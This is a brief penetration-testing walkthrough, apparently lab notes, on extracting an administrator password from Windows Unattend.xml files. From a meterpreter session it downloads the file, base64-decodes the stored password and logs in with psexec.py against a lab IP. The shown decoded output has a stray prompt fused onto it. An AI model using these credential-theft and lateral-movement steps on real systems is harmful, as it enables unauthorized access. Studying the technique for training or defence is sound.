Credentials Dumping

Passwords Configuration Files

Windows configuration files can contain stored passwords, e.g. in the Unattended Windows Setup utility, used to mass deploy Windows on systems.

• The configuration file can contain specific configurations and user account credentials

• An attacker can find the configuration file left on the target after installation

The utility typically utilizes those files:

C:\Windows\Panther\Unattend.xml

C:\Windows\Panther\Autounattend.xml

• The stored passwords might be encoded in base64 (easily decodable).

#Exploitation

After getting a meterpreter session or shell session follow the follwing technique:-

• Manually search for the unattend.xml file, it should be inside

  • C:\\Windows\\Panther

cd C:\\Windows\\Panther
dir
download unattend.xml

• In a new terminal tab

cat unattend.xml

Get Access

• administrator user configured base64 password is QWRtaW5AMTIz

  • Save it to a new file

  • Decode it using the base64 tool

nano password.txt
# paste the password, save and exit the file

base64 -d password.txt 
	Admin@123root

• Test the administrator:Admin@123root credentials with the psexec tool

psexec.py administrator@10.4.19.9

You have gained access to the administrator account